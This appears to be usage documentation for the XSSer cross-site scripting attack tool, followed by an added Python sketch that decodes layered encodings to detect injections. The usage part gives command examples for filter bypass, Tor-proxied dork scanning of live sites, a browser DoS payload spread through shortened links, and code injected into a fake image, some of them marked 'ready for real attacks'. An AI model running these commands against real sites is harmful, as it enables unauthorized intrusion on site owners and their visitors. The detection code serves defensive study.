
XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications. It contains several options to try to bypass certain filters, and various special techniques of code injection.

Usage

python [-u -i -d ] [-p -g -c ] [OPTIONS] [Request] [Bypassing] [Techniques]

Examples

* Simple injection from URL:

$ python -u ""

-------------------

* Simple injection from file, with Tor proxy and spoofed HTTP Referer headers:

$ python -i "file.txt" --proxy "" --referer "666.666.666.666"

-------------------

* Multiple injections from URL, with fuzzing, using Tor proxy, applying "Hexadecimal" character encoding to the payloads, with verbose output and saving results to file (XSSlist.dat):

$ python -u "" --proxy "" --Fuzz --Hex --verbose -w

-------------------

* Multiple injections from URL, with fuzzing, using character encoding mutations (first, change the payload to hexadecimal; second, convert the first encoding to StringFromCharCode; third, re-encode the second encoding to hexadecimal), with a spoofed HTTP User-Agent, changing the timeout to "20" and using multithreading (5 threads):

$ python -u "" --Fuzz --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"

-------------------

* Advanced injection from file, supplying your -own- payload and using Unescape() character encoding to bypass filters:

$ python -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une

-------------------

* Injection from dork, selecting the "duck" engine (XSSer Storm!):

$ python --De "duck" -d "search.php?"

-------------------

* Injection from crawler with depth 3 and 4 pages to see (XSSer Spider!):

$ python -c3 --Cw=4 -u ""

-------------------

* Simple injection from URL, using POST, with statistics results:

$ python -u "" -p "index.php?target=search&subtarget=top&searchstring=" -s

-------------------

* Multiple injections from URL into a parameter sent with GET, using fuzzing, with IP octal payload obfuscation and printing results as a "tinyurl" shortened link (ready for share!):

$ python -u "" -g "bs/?q=" --Fuzz --Doo --short tinyurl

-------------------

* Simple injection from URL, using GET, injecting a vector in the Cookie parameter, trying to use a DOM shadow space (no server logging!) and, if any "hole" exists, applying your manual final payload "malicious" code (ready for real attacks!):

$ python -u "" -g "bs/?q=" --Coo --Anchor --Fr="!enter your final injection code here!"

-------------------

* Simple injection from URL, using GET and trying to generate from the results a "malicious" shortened link with a valid DoS (Denial of Service) browser client payload:

$ python -u "" -g "bs/?q=" --Dos --short ""

-------------------

* Multiple injections to multiple places, extracting targets from a list in a file, applying fuzzing, changing the timeout to "20" and using multithreading (5 threads), increasing the delay between requests to 10 seconds, injecting parameters in the HTTP User-Agent, HTTP Referer and Cookie parameters, using a Tor proxy, with IP octal obfuscation, with statistics results, in verbose mode and creating shortened links (tinyurl) of any valid injecting payloads found (real playing mode!):

$ python -i "list_of_url_targets.txt" --Fuzz --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "" --Doo -s --verbose --Dos --short "tinyurl"

-------------------

* Injection of a user XSS vector directly into a malicious -fake- image created "on the wild", and ready to be uploaded:

$ python --Imx "test.png" --payload "!enter your malicious injection code here!"

-------------------

* Report output of 'positive' injections from a dorking search (using the "ask" dorker) directly to an XML file:

$ python -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"

-------------------

* Publish output of 'positive' injections from a dorking search (using the "duck" dorker) directly to (federated XSS pentesting botnet):

$ python -d "login.php" --De "duck" --publish
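
Seen from the defending side, the chained "Hex,Str,Hex" mutation and the injections into User-Agent, Referer and Cookie explain why a filter that decodes a value once, or looks only at the query string, misses these payloads. The following sketch is an added example, not part of XSSer or the original post: it decodes each field until it stops changing before matching. It assumes "Hex" means URL percent-encoding and "Str" means String.fromCharCode(...); the host name, the signature list and all sample values are constructed.

```python
import re
from html import unescape
from urllib.parse import parse_qsl, unquote, urlsplit

FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(([\d\s,]*)\)", re.I)
# Deliberately small signature set for the demo; use a maintained ruleset in production.
SUSPICIOUS = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)

def fold_char_codes(match):
    """Turn String.fromCharCode(60,115,...) back into the characters it builds."""
    codes = (int(n) for n in re.findall(r"\d+", match.group(1)))
    return "".join(chr(c) for c in codes if c < 0x110000)

def normalize(value, max_rounds=10):
    """Peel encoding layers until the value stops changing or the budget runs out."""
    for _ in range(max_rounds):
        decoded = FROM_CHAR_CODE.sub(fold_char_codes, unescape(unquote(value)))
        if decoded == value:
            break
        value = decoded
    return value

def single_pass_hit(value):
    """What a filter sees if it percent-decodes exactly once before matching."""
    return SUSPICIOUS.search(unquote(value)) is not None

def scan_request(url, headers):
    """Return the names of request fields whose normalized value looks like script injection."""
    fields = {f"query:{k}": v for k, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)}
    for name in ("User-Agent", "Referer", "Cookie"):
        if name in headers:
            fields[f"header:{name}"] = headers[name]
    return sorted(name for name, v in fields.items() if SUSPICIOUS.search(normalize(v)))

def pct(text):
    """Percent-encode every character; used only to build the constructed sample."""
    return "".join(f"%{ord(c):02x}" for c in text)

# Constructed sample: a harmless marker wrapped Hex -> Str -> Hex, as in the --Cem example.
INNER = pct("<script>alert(1)</script>")
LAYERED = pct("String.fromCharCode(" + ",".join(str(ord(c)) for c in INNER) + ")")
SAMPLE_URL = "http://app.example.test/search.php?q=" + LAYERED
SAMPLE_HEADERS = {
    "User-Agent": "%3Cscript%3Ealert(1)%3C/script%3E",
    "Referer": "http://app.example.test/home",
    "Cookie": "session=abc123",
}

if __name__ == "__main__":
    print(single_pass_hit(LAYERED), scan_request(SAMPLE_URL, SAMPLE_HEADERS))
```

Normalizing before matching is a detection aid only; context-aware output encoding in the application remains the actual fix for XSS.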
